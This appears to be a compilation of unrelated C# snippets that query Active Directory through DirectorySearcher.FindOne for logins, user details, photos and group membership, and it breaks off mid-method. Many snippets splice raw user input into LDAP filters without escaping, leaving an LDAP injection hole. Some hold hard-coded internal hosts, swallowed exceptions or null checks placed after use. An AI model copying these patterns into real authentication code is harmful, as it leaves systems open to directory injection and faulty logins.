private void btnLogin_Click(object sender, EventArgs e)
{
if (txtUserName.Text.Length == 0 || txtPassword.Text.Length == 0)
{
MessageBox.Show("用户名或者密码不能为空。", this.Text, MessageBoxButtons.OK, MessageBoxIcon.Warning);
return;
}
string directoryPath = "LDAP://" + GetDomainName();
string domainAndUsername = directoryPath + txtUserName.Text;
try
{
DirectoryEntry entry = new DirectoryEntry(directoryPath, txtUserName.Text, txtPassword.Text);
DirectorySearcher search = new DirectorySearcher(entry);
SearchResult result = search.FindOne();
MessageBox.Show("登录成功。", this.Text, MessageBoxButtons.OK, MessageBoxIcon.Information);
}
catch (Exception ex)
{
// 如果用户名或者密码不正确,也会抛出异常。
MessageBox.Show(ex.Message, this.Text, MessageBoxButtons.OK, MessageBoxIcon.Stop);
}
}
public static SearchResult GetSearchResult(string user, string password, string LDAPPath)
{
SearchResult sRsResult = null;
DirectoryEntry entry = null;
DirectorySearcher mySearcher = null;
entry = GetDirectoryEntry(user, password, LDAPPath);
if (entry != null)
{
try
{
mySearcher = new DirectorySearcher(entry);
}
catch (COMException) { };
if (mySearcher != null)
{
try
{
string strFilter = "(&(objectCategory=person)(objectClass=user)(sAMAccountName=" + user + "))";
mySearcher.Filter = strFilter;
sRsResult = mySearcher.FindOne();
}
catch (COMException) { };
}
else { };
}
else { };
return sRsResult;
}
public BitmapImage GetUserImage(string userName)
{
using (DirectorySearcher dsSearcher = new DirectorySearcher(this.entry))
{
dsSearcher.Filter = "(&(objectClass=user) (cn=" + userName.Split('\\').Last() + "*))";
SearchResult result = dsSearcher.FindOne();
if (result == null)
return null;
using (DirectoryEntry user = new DirectoryEntry(result.Path))
{
byte[] data = user.Properties[this.imageProperty].Value as byte[];
if (data == null)
return null;
using (var stream = new MemoryStream(data))
{
BitmapImage image = new BitmapImage();
image.BeginInit();
image.StreamSource = stream;
image.EndInit();
return image;
}
}
}
}
public static Task Test()
{
return Task.Run(() => {
string strServerDNS = "ldap.hp.com:389";
string strSearchBaseDN = "ou=Email,ou=Services,o=hp.com";
string strLDAPPath;
strLDAPPath = "LDAP://" + strServerDNS + "/" + strSearchBaseDN;
DirectoryEntry objDirEntry = new DirectoryEntry(strLDAPPath, null, null, AuthenticationTypes.Anonymous);
DirectorySearcher searcher = new DirectorySearcher(objDirEntry);
SearchResult result = null;
searcher.Filter = "[email protected]";
searcher.PropertiesToLoad.Add("ntUserDomainId");
searcher.ClientTimeout = TimeSpan.FromSeconds(20);
try
{
result = searcher.FindOne();
}
catch (Exception ex)
{
}
finally
{
searcher.Dispose();
}
});
}
//Get employee active directory login
public bool IsActiveDirectoryLogin(string EmplID, string Password)
{
string _path = "LDAP://10.82.33.21/dc=wcz,dc=wistron";
string _filterAttribute;
string domainAndUsername = @"WCZ\" + EmplID;
DirectoryEntry entry = new DirectoryEntry(_path,
domainAndUsername,
Password);
try
{
// Bind to the native AdsObject to force authentication.
Object obj = entry.NativeObject;
DirectorySearcher search = new DirectorySearcher(entry);
search.Filter = "(SAMAccountName=" + EmplID + ")";
search.PropertiesToLoad.Add("cn");
SearchResult result = search.FindOne();
if (null == result)
{
//error msg here
}
// Update the new path to the user in the directory
_path = result.Path;
_filterAttribute = (String)result.Properties["cn"][0];
return true;
}
catch (Exception ex)
{
string Message = "Error:" + ex.Message;
return false;
}
}
public bool isValidMailID(String mailID)
{
try
{
System.DirectoryServices.DirectoryEntry dirEntry = new System.DirectoryServices.DirectoryEntry("LDAP://SukantaServer");
System.DirectoryServices.DirectorySearcher dirSearcher = new System.DirectoryServices.DirectorySearcher(dirEntry);
dirSearcher.Filter = "(SAMAccountName=" + mailID + ")";
System.DirectoryServices.SearchResult result = dirSearcher.FindOne();
if (result != null)
{
return(true);
}
else
{
return(false);
}
}
catch (Exception ex)
{
//throw new Exception("User not authenticated: " + ex.Message);
return(false);
}
}
/// <summary>
/// �������û�������
/// </summary>
/// <param name="UserName">���û���</param>
/// <param name="OldPassword">������</param>
/// <param name="NewPassword">������</param>
/// <param name="DomainName">DNS����</param>
/// <returns>�ɹ������棬���ɹ����ؼ�</returns>
public static bool ChangePassword(string UserName, string OldPassword, string NewPassword, string DomainName)
{
try
{
string UserPrincipalName = UserName + "@" + DomainName;
DirectoryEntry deRootDSE = new DirectoryEntry("LDAP://RootDSE", UserPrincipalName, OldPassword, AuthenticationTypes.Secure);
DirectoryEntry deDomain = new DirectoryEntry("LDAP://" + deRootDSE.Properties["defaultNamingContext"].Value.ToString(), UserPrincipalName, OldPassword, AuthenticationTypes.Secure);
DirectorySearcher dsSearcher = new DirectorySearcher();
dsSearcher.SearchRoot = deDomain;
dsSearcher.SearchScope = SearchScope.Subtree;
dsSearcher.Filter = "(userPrincipalName=" + UserPrincipalName + ")";
SearchResult srResult = dsSearcher.FindOne();
if (srResult != null)
{
DirectoryEntry deUser = new DirectoryEntry(srResult.GetDirectoryEntry().Path, UserPrincipalName, OldPassword, AuthenticationTypes.Secure);
deUser.Invoke("ChangePassword", new object[] { OldPassword, NewPassword });
deUser.CommitChanges();
return true;
}
else
return false;
}
catch //(Exception ex)
{
return false;// ex.Message;
}
}
public static KUsr GetKUsr(string userId)
{
var kUsr = new KUsr();
if (string.IsNullOrWhiteSpace(userId))
return kUsr;
kUsr.UserId = userId;//AmUtil.GetCurrentUser;
SearchResult result = null;
using (DirectoryEntry AdEntry = ConfigUtility.IsAdTLogin() ?
new DirectoryEntry(ConfigUtility.GetActiveDirectory()) :
new DirectoryEntry(ConfigUtility.GetActiveDirectory(), ConfigUtility.GetAdLoginInfo().Item1, ConfigUtility.GetAdLoginInfo().Item2))
{
using (DirectorySearcher AdSearcher = new DirectorySearcher(AdEntry))
{
AdSearcher.Filter = "(CN=" + kUsr.UserId + ")";
AdSearcher.PropertiesToLoad.Add(kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Domain).Name);
AdSearcher.PropertiesToLoad.Add(kUsr.GetPropAttr<KUsr, AltPropName>(x => x.FName).Name);
AdSearcher.PropertiesToLoad.Add(kUsr.GetPropAttr<KUsr, AltPropName>(x => x.LName).Name);
AdSearcher.PropertiesToLoad.Add(kUsr.GetPropAttr<KUsr, AltPropName>(x => x.EmailId).Name);
//AdSearcher.PropertiesToLoad.Add(kUsr.GetPropAttr<KUsr, AltPropName>(x => x.UserInitials).Name);
AdSearcher.PropertiesToLoad.Add(kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Location).Name);
AdSearcher.PropertiesToLoad.Add(kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Department).Name);
result = AdSearcher.FindOne();
}
//AdEntry.Close();
}
if (result != null)
{
DirectoryEntry usrEntry = result.GetDirectoryEntry();
kUsr.Domain = usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Domain).Name].Value == null ? null :
usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Domain).Name].Value.ToString();
kUsr.FName = usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.FName).Name].Value == null ? null :
usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.FName).Name].Value.ToString();
kUsr.LName = usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.LName).Name].Value == null ? null :
usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.LName).Name].Value.ToString();
kUsr.EmailId = usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.EmailId).Name].Value == null ? null :
usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.EmailId).Name].Value.ToString();
//kUsr.UserInitials = usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.UserInitials).Name].Value == null ? null :
// usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.UserInitials).Name].Value.ToString();
kUsr.Location = usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Location).Name].Value == null ? null :
usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Location).Name].Value.ToString();
kUsr.Department = usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Department).Name].Value == null ? null :
usrEntry.Properties[kUsr.GetPropAttr<KUsr, AltPropName>(x => x.Department).Name].Value.ToString();
}
return kUsr;
}
public static string UserName(string loginDomain)
{
string domain = loginDomain.Substring(0, loginDomain.LastIndexOf(@"\"));
string login = loginDomain.Substring(loginDomain.LastIndexOf(@"\") + 1);
string nome = string.Empty;
if (DirectoryEntry.Exists("LDAP://" + domain))
{
using (DirectorySearcher ds = new DirectorySearcher())
{
ds.SearchRoot = new DirectoryEntry("LDAP://" + domain);
ds.Filter = string.Format("(|(&(objectCategory=user)(sAMAccountName={0})))", login);
SearchResult src = ds.FindOne();
if (src != null)
{
nome = src.Properties["displayName"][0].ToString();
}
}
}
else
{
throw new Exception("Domínio não encontrado");
}
return nome;
}
public bool IsAuthenticated(string domain, string username, string pwd)
{
string domainAndUsername = domain + "\\" + username;
DirectoryEntry entry = new DirectoryEntry(_path, domainAndUsername, pwd);
try {
//Bind to the native AdsObject to force authentication.
object obj = entry.NativeObject;
DirectorySearcher search = new DirectorySearcher(entry);
search.Filter = "(SAMAccountName=" + username + ")";
search.PropertiesToLoad.Add("cn");
SearchResult result = search.FindOne();
if ((result == null)) {
return false;
}
//Update the new path to the user in the directory.
_path = result.Path;
_filterAttribute = Convert.ToString(result.Properties["cn"][0]);
} catch (Exception ex) {
throw new Exception("Error authenticating user. " + ex.Message);
}
return true;
}
private static bool AutenticarEnDominio(string userDisplayName, string codigoUsuario, string password)
{
ILog Logger = LogManager.GetLogger(MethodBase.GetCurrentMethod().DeclaringType);
DirectoryEntry entry = GetDirectoryEntry();
entry.Username = codigoUsuario;
entry.Password = password;
try
{
var ds = new DirectorySearcher(entry)
{
Filter = ("(&(objectclass=user)(objectcategory=person)(displayname=" + userDisplayName + "))")
};
ds.SearchScope = SearchScope.Subtree;
SearchResult results = ds.FindOne();
if (results != null)
{
return true;
}
entry.Close();
return false;
}
catch (Exception ex)
{
Logger.Error("Exception AutenticarEnDominio:" + ex.Message);
return false;
}
}
private void getActiveUser_Department(string usr)//Get Acetive User's Department
{
CommonFunctions clsCom = new CommonFunctions();
String LDAP = clsCom.getADIPAddress(Company);
System.DirectoryServices.DirectoryEntry dirEntry;
System.DirectoryServices.DirectorySearcher dirSearcher;
dirEntry = new System.DirectoryServices.DirectoryEntry(LDAP);
dirSearcher = new System.DirectoryServices.DirectorySearcher(Company);
dirSearcher.Filter = "(&(objectClass=user)(SAMAccountName=" + usr + "))";
SearchResult sr = dirSearcher.FindOne();
System.DirectoryServices.DirectoryEntry de = sr.GetDirectoryEntry();
if (sr == null)
{
return;
}
else
{
userDepartment = de.Properties["Department"].Value.ToString();
Session["User_Department"] = userDepartment;
}
}
public override string[] GetRolesForUser(string username)
{
try
{
List<string> rv = new List<string>();
DirectoryEntry deGetCN = new DirectoryEntry(WebConfigurationManager.ConnectionStrings["LDAP"].ConnectionString);
DirectorySearcher dsGet = new DirectorySearcher(deGetCN);
dsGet.Filter = "(SAMAccountName=" + username + ")";
dsGet.ServerTimeLimit = new TimeSpan(0, 0, 5);
dsGet.ClientTimeout = new TimeSpan(0, 0, 5);
dsGet.PropertiesToLoad.Add("memberOf");
SearchResult sr = dsGet.FindOne();
if (sr == null)
throw new ArgumentNullException("Invalid user");
else
{
for (int i = 0; i < sr.Properties["memberOf"].Count; i++)
{
string result = (string)sr.Properties["memberOf"][i];
int ixEqual = result.IndexOf("=", 1);
int ixComma = result.IndexOf(",", 1);
if (ixEqual == -1)
return null;
rv.Add(result.Substring(ixEqual + 1, (ixComma - ixEqual) - 1));
}
return rv.ToArray();
}
}
catch (Exception)
{
throw;
}
}
// potentially not needed due to use of the role provider
public string GetGroups()
{
DirectorySearcher search = new DirectorySearcher(_path);
search.Filter = "(cn=" + _filterAttribute + ")";
search.PropertiesToLoad.Add("memberOf");
StringBuilder groupNames = new StringBuilder();
try
{
SearchResult result = search.FindOne();
int propertyCount = result.Properties["memberOf"].Count;
string dn;
int equalsIndex, commaIndex;
for (int propertyCounter = 0; propertyCounter < propertyCount; propertyCounter++)
{
dn = (string)result.Properties["memberOf"][propertyCounter];
equalsIndex = dn.IndexOf("=", 1);
commaIndex = dn.IndexOf(",", 1);
if (-1 == equalsIndex)
{
return null;
}
groupNames.Append(dn.Substring((equalsIndex + 1), (commaIndex - equalsIndex) - 1));
groupNames.Append("|");
}
}
catch (Exception ex)
{
throw new Exception("Error obtaining group names. " + ex.Message);
}
return groupNames.ToString();
}
public UserModel AuthenticateAgainstDomain(string domainName, string password)
{
try
{
var directoryEntry = new DirectoryEntry(LDAP, domainName, password);
var searchAdForUser = new DirectorySearcher(directoryEntry) { Filter = "(&(objectClass=user)(anr=" + domainName + "))" };
var retrievedUser = searchAdForUser.FindOne();
var ldapEmailAddress = retrievedUser.Properties["mail"][0].ToString();
var existingUser = this.userRepository.Find(new UserSpecification().WithEmailAddress(ldapEmailAddress));
if(existingUser == null)
{
existingUser = new User { EmailAddress = ldapEmailAddress };
}
this.userRepository.Save(existingUser);
var userModel = new UserModel()
{
Title = retrievedUser.Properties["title"][0].ToString(),
Mobile = retrievedUser.Properties["mobile"][0].ToString(),
EmailAddress = ldapEmailAddress,
Name = retrievedUser.Properties["givenname"][0].ToString(),
Surname = retrievedUser.Properties["sn"][0].ToString()
};
return userModel;
}
catch (DirectoryServicesCOMException ex)
{
throw new Exception(ex.Message);
}
}
public string GetGroups()
{
DirectorySearcher searcher = new DirectorySearcher(this._path);
searcher.Filter = "(cn=" + this._filterAttribute + ")";
searcher.PropertiesToLoad.Add("memberOf");
StringBuilder builder = new StringBuilder();
try
{
SearchResult result = searcher.FindOne();
int count = result.Properties["memberOf"].Count;
for (int i = 0; i < count; i++)
{
string str = (string)result.Properties["memberOf"][i];
int index = str.IndexOf("=", 1);
int num3 = str.IndexOf(",", 1);
if (-1 == index)
{
return null;
}
builder.Append(str.Substring(index + 1, (num3 - index) - 1));
builder.Append("|");
}
}
catch (Exception exception)
{
throw new Exception("Error obtaining group names. " + exception.Message);
}
return builder.ToString();
}
/// <summary>
/// Get the primary SMTP address of the given user name
/// </summary>
/// <param name="upnUserName">UPN formatted user name to look up</param>
/// <returns>Primary SMTP address of the user if found</returns>
public static string GetPrimarySmtp(string upnUserName)
{
string primarySmtp = string.Empty;
// Use the current user's identity to get their
// default SMTP address from the default domain.
// In other words - make a lot of assumptions!
// This logic is very thin but maybe it will stand up...
// Expecting the format of the identity to be
// 'DomainName\sAMAccountName', if not BOOM!
if (!upnUserName.Contains("\\"))
{
throw new ApplicationException("Unknown identity name pattern, cannot retrieve default SMTP address.");
}
// Tear off the sAMAccountName from the identity string
string sAMAccountName = upnUserName.Split(new char[] { '\\' })[1];
// Search AD for the sAMAccountName
DirectorySearcher ds = new DirectorySearcher();
ds.Filter = string.Format(System.Globalization.CultureInfo.CurrentCulture, "sAMAccountName={0}", sAMAccountName);
SearchResult result = ds.FindOne();
if (result == null)
{
// If there are no results go BOOM!
throw new ApplicationException("Directory entry not found, cannot retrieve default SMTP address.");
}
// Get the 'mail' property and assume the
// first value is the primary SMTP address
return result.Properties["mail"][0].ToString();
}
private void RequesterEmail_comboBox_SelectedIndexChanged(object sender, EventArgs e)
{
// Get user first name and last name by email
string mail = RequesterEmail_comboBox.Text;
DirectoryEntry entry = new DirectoryEntry();
DirectorySearcher adsearcher = new DirectorySearcher(entry);
adsearcher.Filter = "(&(objectClass=user)(mail=" + mail + "))";
adsearcher.PropertiesToLoad.Add("givenName");
adsearcher.PropertiesToLoad.Add("sn");
adsearcher.PropertiesToLoad.Add("mail");
SearchResult result = adsearcher.FindOne();
if (result == null)
MessageBox.Show("Email Does Not Exist !!" + Environment.NewLine + "Please Check Your Spelling !!");
if (result != null)
{
DirectoryEntry employee = result.GetDirectoryEntry();
string FirstName = employee.Properties["givenName"].Value.ToString();
string LastName = employee.Properties["sn"].Value.ToString();
RequesterFirstName_txtBox.Text = FirstName;
RequesterLastName_txtBox.Text = LastName;
}
}
public Image GetUserPicture(string userName, string domain)
{
var directoryEntry = new DirectoryEntry("LDAP://" + domain);
var propertiesToLoad = new[] { "thumbnailPhoto", "samaccountname" };
var filter = $"(&(SAMAccountName={userName}))";
var directorySearcher = new DirectorySearcher(directoryEntry, filter, propertiesToLoad);
var user = directorySearcher.FindOne();
if (user == null)
{
_log.Warn($"Could not find user '{userName}' in active directory");
return null;
}
if (!user.Properties.Contains("thumbnailPhoto"))
{
var message = "LDAP did not contain a thumbnailPhoto property for " + userName;
_log.Warn(message);
return null;
}
var bytes = user.Properties["thumbnailPhoto"][0] as byte[];
if (bytes == null) return null;
using (var ms = new MemoryStream(bytes))
{
var image = Image.FromStream(ms);
return image;
}
}
private void Initialize()
{
this.Name = Domain.Name;
var dc = Domain.FindDomainController();
string ldapPath = string.Format("LDAP://{0}/", dc.Name);
using (var adRootDSE = new DirectoryEntry(ldapPath + "RootDSE"))
{
this.DistinguishedName = adRootDSE.Properties["defaultNamingContext"][0].ToString();
this.ConfigurationNamingContext = adRootDSE.Properties["configurationNamingContext"][0].ToString();
}
using (var adDomainRoot = new DirectoryEntry(ldapPath + this.DistinguishedName))
{
this.SecurityIdentifier = new SecurityIdentifier((byte[])(adDomainRoot.Properties["objectSid"][0]), 0);
}
using (var configSearchRoot = new DirectoryEntry(ldapPath + "CN=Partitions," + this.ConfigurationNamingContext))
{
var configSearchFilter = string.Format("(&(objectcategory=Crossref)(dnsRoot={0})(netBIOSName=*))", this.Name);
using (var configSearcher = new DirectorySearcher(configSearchRoot, configSearchFilter, new string[] { "NetBIOSName" }, System.DirectoryServices.SearchScope.OneLevel))
{
SearchResult configResult = configSearcher.FindOne();
if (configResult != null)
this.NetBiosName = configResult.Properties["NetBIOSName"][0].ToString();
else
this.NetBiosName = null;
}
}
}
public User AuthenticateUser(string username, string password)
{
try
{
DirectoryEntry deSystem = new DirectoryEntry();
deSystem.AuthenticationType = AuthenticationTypes.Secure;
deSystem.Username = username;
deSystem.Password = password;
// Bind to the native AdsObject to force authentication.
Object obj = deSystem.NativeObject;
DirectorySearcher ds = new DirectorySearcher(deSystem);
ds.Filter = "(SAMAccountName=" + username + ")";
ds.PropertiesToLoad.Add("name");
ds.PropertiesToLoad.Add("mail");
SearchResult sr = ds.FindOne();
if (sr == null)
{
return null;
}
DirectoryEntry de = sr.GetDirectoryEntry();
User user = new User();
user.UserId = username;
user.UserName = de.Properties["name"].Value.ToString();
user.Email = de.Properties["mail"].Value.ToString();
return user;
}
catch (Exception ex)
{
string s = ex.Message;
return null;
}
}
private Dictionary <string, string> GetUsedAttributesWorking(string objectDn)
{
Dictionary <string, string> props = new Dictionary <string, string>();
// Get the currently connected LDAP context
System.DirectoryServices.DirectoryEntry entry1 = new System.DirectoryServices.DirectoryEntry("LDAP://RootDSE");
string domainContext = entry1.Properties["defaultNamingContext"].Value as string;
// Use the default naming context as the connected context may not work for searches
System.DirectoryServices.DirectoryEntry entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + domainContext);
System.DirectoryServices.DirectorySearcher adSearch = new System.DirectoryServices.DirectorySearcher(entry);
adSearch.Filter = "(&(objectClass=user)(anr=" + objectDn + "))";
string[] requiredProperties = new string[] { "cn", "userprincipalname", "physicaldeliveryofficename", "distinguishedname", "telephonenumber", "mail", "title", "department", "adspath" };
foreach (String property in requiredProperties)
{
adSearch.PropertiesToLoad.Add(property);
}
SearchResult result = adSearch.FindOne();
if (result != null)
{
foreach (String property in requiredProperties)
{
foreach (Object myCollection in result.Properties[property])
{
props.Add(property, myCollection.ToString());
}
}
}
return(props);
}
public LdapUser(DirectoryEntry adentry, String userName, LdapSettings ldapSettings)
{
userid = new LdapAttribute("userid", userName);
DirectorySearcher ds = new DirectorySearcher(adentry);
ds.Filter = "(&(sAMAccountName=" + userName + "))";
SearchResult result = ds.FindOne();
DirectoryEntry ent = null;
if (result != null)
{
ent = result.GetDirectoryEntry();
}
if (ent != null)
{
if (ent.Properties["cn"].Value != null)
{
commonname = new LdapAttribute("commonname", ent.Properties["cn"].Value.ToString());
}
else
{
commonname = new LdapAttribute("commonname", userName);
}
if (ent.Properties["mail"].Value != null)
{
email = new LdapAttribute("email", ent.Properties["mail"].Value.ToString());
}
else
{
email = new LdapAttribute("email", userName + "@" + ldapSettings.Domain);
}
}
}
static public void getGrups(string username, string group_Admin)
{
try
{
// string filter = string.Format("(&(ObjectClass={0})(sAMAccountName={1}))", "person", "afanasievdv");
string domain = "isea.ru";
string[] properties = new string[] { "fullname" };
// username = "******";
DirectoryEntry adRoot = new DirectoryEntry("LDAP://" + domain, null, null, AuthenticationTypes.Secure);
DirectorySearcher dirsearcher = new DirectorySearcher(adRoot);
dirsearcher.Filter = string.Format("(&(ObjectClass={0})(sAMAccountName={1}))", "person", username);
dirsearcher.PropertiesToLoad.Add("memberOf");
int propCount;
SearchResult dirSearchResults = dirsearcher.FindOne();
propCount = dirSearchResults.Properties["memberOf"].Count;
DirectoryEntry directoryEntry = dirSearchResults.GetDirectoryEntry();
// string dn, equalsIndex, commaIndex;
PropertyValueCollection groups = directoryEntry.Properties["memberOf"];
foreach (string g in groups)
{
string group = g.Split('=')[1].Split(',')[0];
System.Diagnostics.Debug.WriteLine(group);
}
}
catch (Exception ex)
{
System.Diagnostics.Debug.WriteLine(ex.ToString());
}
}
public bool isAuthenticatedAgainstLDAP(string username, string password)
{
string LDAPServerURL = @"LDAP://directory.monash.edu.au:389/";
string LDAPBaseOU = "o=Monash University,c=AU";
try
{
DirectoryEntry LDAPAuthEntry = new DirectoryEntry(LDAPServerURL + LDAPBaseOU, "", "", AuthenticationTypes.Anonymous);
DirectorySearcher LDAPDirectorySearch = new DirectorySearcher(LDAPAuthEntry);
LDAPDirectorySearch.ClientTimeout = new System.TimeSpan(0, 0, 5);
LDAPDirectorySearch.Filter = "uid=" + username;
SearchResult LDAPSearchResponse = LDAPDirectorySearch.FindOne();
string NewSearchPath = LDAPSearchResponse.Path.ToString();
string NewUserName = NewSearchPath.Substring(NewSearchPath.LastIndexOf("/") + 1);
DirectoryEntry AuthedLDAPAuthEntry = new DirectoryEntry(NewSearchPath, NewUserName, password, AuthenticationTypes.None);
DirectorySearcher AuthedLDAPDirectorySearch = new DirectorySearcher(AuthedLDAPAuthEntry);
AuthedLDAPDirectorySearch.ClientTimeout = new System.TimeSpan(0, 0, 5);
AuthedLDAPDirectorySearch.Filter = "";
SearchResultCollection AuthedLDAPSearchResponse = AuthedLDAPDirectorySearch.FindAll();
}
catch (Exception e)
{
//System.Windows.Forms.MessageBox.Show(string.Format("Failed authentication against LDAP because {0}", e.Message));
return false;
}
return true;
}
public override DirectoryObject GetDirectoryObjectById(string id) {
if(id == null) {
throw new ArgumentNullException("id");
}
DirectoryObject directoryObject = null;
if(id.Length > 0) {
using(DirectoryEntry directoryEntry = this.GetDirectoryEntry()) {
using(DirectorySearcher directorySearcher = new DirectorySearcher(
directoryEntry,
string.Format(CultureInfo.InvariantCulture, FilterAndFormat, BaseFilter + string.Format(CultureInfo.InvariantCulture, FilterFormat, this.IdentifyingPropertyName, id)),
PropertyNames,
SearchScope.Subtree)) {
SearchResult searchResult = directorySearcher.FindOne();
if(searchResult != null) {
directoryObject = this.CreateDirectoryObjectInstance();
directoryObject.Id = GetPropertyValue(searchResult, this.IdentifyingPropertyName);
foreach(string propertyName in searchResult.Properties.PropertyNames) {
if(directoryObject.Contains(propertyName)) {
directoryObject[propertyName] = GetPropertyValue(searchResult, propertyName);
}
}
}
}
}
}
return directoryObject;
}
public DirectoryEntry GetUserByPath(String Path)
{
String Domain = db.Parameters.AsNoTracking().Where(p => p.ParamName == "ADDomain").FirstOrDefault().ParamValue;
Parameter adminName = db.Parameters.AsNoTracking().Where(p => p.ParamName == "ADUsername").FirstOrDefault();
Parameter password = db.Parameters.AsNoTracking().Where(p => p.ParamName == "ADPassword").FirstOrDefault();
password.ParamValue = util.Decrypt(password.ParamValue);
string strRootForest = "LDAP://" + Domain;
System.DirectoryServices.DirectoryEntry root = new System.DirectoryServices.DirectoryEntry(strRootForest, adminName.ParamValue, password.ParamValue);
System.DirectoryServices.DirectorySearcher searcher = new System.DirectoryServices.DirectorySearcher(root);
searcher.SearchScope = SearchScope.Subtree;
searcher.ReferralChasing = ReferralChasingOption.All;
string vbSearchCriteria = "(distinguishedName=" + Path + ")";
searcher.Filter = "(&(objectClass=user)" + vbSearchCriteria + ")";
SearchResult result = searcher.FindOne();
System.DirectoryServices.DirectoryEntry ADsObject = result.GetDirectoryEntry();
return(ADsObject);
}
public AdUser GetUserById(string id)
{
try
{
DirectoryEntry entry = new DirectoryEntry("LDAP://infotecs-nt");
string managerDN;
AdUser user;
using (DirectorySearcher dSearch = new DirectorySearcher(entry))
{
dSearch.Filter = string.Format("(&(objectCategory=person)(objectClass=user)(samaccountname={0}))", id);
var result = dSearch.FindOne();
user = MapUserFromAdResult(result);
managerDN = (string)result.Properties["manager"][0];
}
using (DirectorySearcher dSearch = new DirectorySearcher(entry))
{
dSearch.Filter = string.Format("(&(objectCategory=person)(objectClass=user)(distinguishedname={0}))", managerDN);
var result = dSearch.FindOne();
var manager = MapUserFromAdResult(result);
user.Manager = manager;
}
return user;
}
catch
{
}
return null;
}
//- Método que valida el usuario en el Active Directory
public bool ValidarUsuarioActiveDirectory(string _Path, string userId, string password)
{
DirectoryEntry deEntry = new DirectoryEntry(_Path, userId, password);
DirectorySearcher dsSearcher = new DirectorySearcher(deEntry);
bool bandera = false;
try
{
UsuarioId(userId);
dsSearcher.Filter = "(SAMAccountName=" + w_UserAD.Trim() + ")";
dsSearcher.PropertiesToLoad.Add("cn");
SearchResult result = dsSearcher.FindOne();
if (!string.IsNullOrEmpty(result.ToString()))
{
bandera = true;
}
else
{
bandera = false;
}
_path = result.Path;
_filterAttribute = (String)result.Properties["cn"][0];
}
catch (Exception)
{
return false;
}
return bandera;
}
public static DirectoryEntry FindUser(string userName)
{
if (string.IsNullOrEmpty(LoginDomain) || !UseWindowsCreds && (string.IsNullOrEmpty(DomainName) || string.IsNullOrEmpty(Username) || string.IsNullOrEmpty(Password)))
{
if (EditADPrefs.Execute() != System.Windows.Forms.DialogResult.OK)
return null;
}
try
{
DirectoryEntry dom = null;
if (UseWindowsCreds)
dom = new DirectoryEntry("LDAP://" + DomainName);
else
dom = new DirectoryEntry("LDAP://" + DomainName, LoginDomain + @"\" + Username, Password, AuthenticationTypes.None);
using (DirectorySearcher dsSearcher = new DirectorySearcher(dom))
{
dsSearcher.Filter = string.Format("(&(objectClass=user)(|(cn={0})(samaccountname={0})))", userName);
dsSearcher.PropertiesToLoad.Add("ThumbnailPhoto");
SearchResult result = dsSearcher.FindOne();
if (result == null || string.IsNullOrEmpty(result.Path))
return null;
if (UseWindowsCreds)
return new DirectoryEntry(result.Path);
return new DirectoryEntry(result.Path, LoginDomain + @"\" + Username, Password, AuthenticationTypes.None);
}
}
catch (Exception e)
{
MessageBox.Show(string.Format("Failed to search for user.\r\n\r\nError was:\r\n{0}", e.Message), "A/D Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
return null;
}
public static UserEntity FindUserByLogin(string login)
{
// Parse the string to check if domain name is present.
int idx = login.IndexOf('\\');
if (idx == -1)
{
idx = login.IndexOf('@');
}
string strName = idx != -1 ? login.Substring(idx + 1) : login;
const string connection = "LDAP://softserveinc.com";
var dssearch = new DirectorySearcher(connection) { Filter = "(sAMAccountName=" + strName + ")" };
var sresult = dssearch.FindOne();
DirectoryEntry dsresult = sresult.GetDirectoryEntry();
var result = new UserEntity
{
Login = "******" + login,
Name = dsresult.Properties["displayName"][0].ToString(),
Mail = dsresult.Properties["mail"][0].ToString(),
Department = dsresult.Properties["department"][0].ToString(),
Office = dsresult.Properties["physicalDeliveryOfficeName"][0].ToString()
};
return result;
}
public bool GetStatus()
{
DirectorySearcher search = new DirectorySearcher(_path);
search.Filter = "(cn=" + _filterAttribute + ")";
search.PropertiesToLoad.Add("userAccountControl");
try
{
SearchResult result = search.FindOne();
if (null == result)
{
return false;
}
string statusNames = result.Properties["userAccountControl"][0].ToString();
if ("512".Equals(statusNames))
{
return true;
}
// 512 可用账户
// 514 账户无效
// 528 账户锁定
// 8389120 密码过期
return false;
}
catch (Exception ex)
{
return false;
//throw new Exception("Error obtaining userAccountControl names. " + ex.Message);
}
}
private static bool AuthenticateUser(string credentials)
{
var encoding = Encoding.GetEncoding("iso-8859-1");
credentials = encoding.GetString(Convert.FromBase64String(credentials));
var credentialsArray = credentials.Split(':');
var username = credentialsArray[0];
var password = credentialsArray[1];
if (string.IsNullOrEmpty(username))
{
return false;
}
var directoryEntry = new DirectoryEntry(Ldap, username, password);
var searchAdForUser = new DirectorySearcher(directoryEntry) { Filter = "(&(objectClass=user)(anr=" + username + "))" };
var retrievedUser = searchAdForUser.FindOne();
if (retrievedUser == null)
{
return false;
}
var identity = new GenericIdentity(username);
SetPrincipal(new GenericPrincipal(identity, null));
return true;
}
/// <summary>
/// Retrieves the user information.
/// </summary>
/// <param name="userNameToRetrieveFrom">The user name to retrieve from.</param>
/// <returns></returns>
/// <remarks></remarks>
public LdapUserInfo RetrieveUserInformation(string userNameToRetrieveFrom)
{
System.DirectoryServices.DirectorySearcher ldapSearcher = new System.DirectoryServices.DirectorySearcher();
System.DirectoryServices.SearchResult ldapResult = default(System.DirectoryServices.SearchResult);
string filter = "(&(objectClass=user)(SAMAccountName=" + userNameToRetrieveFrom + "))";
System.DirectoryServices.DirectoryEntry ldap = default(System.DirectoryServices.DirectoryEntry);
try
{
if (LdapLogonUserName == null)
{
